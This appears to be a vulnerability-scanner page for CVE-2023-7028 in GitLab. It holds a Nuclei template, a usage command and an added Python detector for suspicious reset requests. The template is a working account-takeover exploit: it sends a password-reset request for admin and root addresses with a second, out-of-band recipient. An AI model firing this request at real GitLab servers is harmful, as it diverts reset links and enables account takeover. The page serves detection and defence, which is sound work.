GitLab - Account Takeover via Password Reset
ID: CVE-2023-7028
Severity: high
Author: DhiyaneshDk,rootxharsh,iamnooob,pdresearch
Tags: hackerone,cve,cve2023,gitlab,auth-bypass,intrusive,kev
Description
An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.
YAML Source

id: CVE-2023-7028

info:
  name: GitLab - Account Takeover via Password Reset
  author: DhiyaneshDk,rootxharsh,iamnooob,pdresearch
  severity: high
  description: |
    An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.
  reference:
    - https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/
    - https://x.com/rwincey/status/1745659710089437368?s=20
    - https://gitlab.com/gitlab-org/gitlab/-/issues/436084
    - https://hackerone.com/reports/2293343
    - https://github.com/V1lu0/CVE-2023-7028
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-7028
    cwe-id: CWE-640,CWE-284
    epss-score: 0.95952
    epss-percentile: 0.99464
    cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*
  metadata:
    verified: true
    max-request: 6
    vendor: gitlab
    product: gitlab
    shodan-query:
      - title:"Gitlab"
      - cpe:"cpe:2.3:a:gitlab:gitlab"
      - http.title:"gitlab"
    fofa-query: title="gitlab"
    google-query: intitle:"gitlab"
  tags: hackerone,cve,cve2023,gitlab,auth-bypass,intrusive,kev

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /users/sign_in HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: token
        group: 1
        regex:
          - name="authenticity_token" value="([A-Za-z0-9_-]+)"
        internal: true

  - raw:
      - |
        @timeout: 20s
        POST /users/password HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}/users/password/new

        authenticity_token={{token}}&user[email][]={{username}}&user[email][]={{rand_base(6)}}@{{interactsh-url}}

    payloads:
      username:
        - admin@{{RDN}}
        - root@{{RDN}}
        - gitlab@{{RDN}}
        - git@{{RDN}}

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'smtp')

    extractors:
      - type: dsl
        dsl:
          - username
# digest: 4b0a004830460221008989ca7a114182f9cd8a22e76be35a0fc8cfdfda45ad29e1eda5b5a7ecd6b0cc022100caef7ee4708b5ca4ad179d1230f7f45b071dbf6dec9a8bc47855c66bee48ecd7:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect the vulnerability described above with the Nuclei tool. The first request fetches the sign-in page to extract the authenticity_token; the second submits the password-reset form with two user[email][] values, and the template reports a match when the interactsh server receives SMTP traffic for the second address. Note that the template is tagged intrusive: a successful check means a real password-reset email has been triggered.

$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-7028.yaml"
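As a defender-side counterpart to the template above (an added example, not part of the Nuclei template or of GitLab), the following Python flags request records that have the shape the template sends: a POST to /users/password whose form body carries more than one recipient address. The record format (method, path, form body) and the sample records are constructed for illustration.

```python
"""Added defensive example for CVE-2023-7028 (not part of the Nuclei
template or of GitLab). Flags password-reset requests that submit more
than one recipient address, which is the request shape the template sends.
Record format and sample records are constructed for illustration."""
from urllib.parse import parse_qs

RESET_PATH = "/users/password"
ARRAY_FIELD = "user[email][]"   # array form the vulnerable versions accepted
SCALAR_FIELD = "user[email]"    # single-address field the normal form posts


def reset_emails(body: str) -> list[str]:
    """Every address submitted in a /users/password form body, in order."""
    form = parse_qs(body, keep_blank_values=True)
    return form.get(ARRAY_FIELD, []) + form.get(SCALAR_FIELD, [])


def is_suspicious(method: str, path: str, body: str) -> bool:
    """True for a reset POST naming more than one address (the CWE-640
    pattern: the reset mail can reach an address the account never verified)."""
    if method != "POST" or path.split("?", 1)[0] != RESET_PATH:
        return False
    return len(reset_emails(body)) > 1


# Constructed request records (method, path, form body); not real traffic.
SAMPLE_REQUESTS = [
    ("POST", RESET_PATH,
     "authenticity_token=t&user[email][]=admin@example.org"
     "&user[email][]=x1y2z3@oast.example"),
    ("POST", RESET_PATH, "authenticity_token=t&user[email]=alice@example.org"),
    ("GET", "/users/sign_in", ""),
    ("POST", RESET_PATH, "authenticity_token=t&user[email][]=bob@example.org"),
]


def scan(records) -> list[tuple[str, list[str]]]:
    """Return (path, submitted addresses) for each suspicious record."""
    return [(path, reset_emails(body))
            for method, path, body in records
            if is_suspicious(method, path, body)]


if __name__ == "__main__":
    for path, emails in scan(SAMPLE_REQUESTS):
        print(f"suspicious reset on {path}: {emails}")
```

Only the first sample record is flagged: a single-address reset, whether sent as user[email] or as a one-element user[email][], is the normal form and passes.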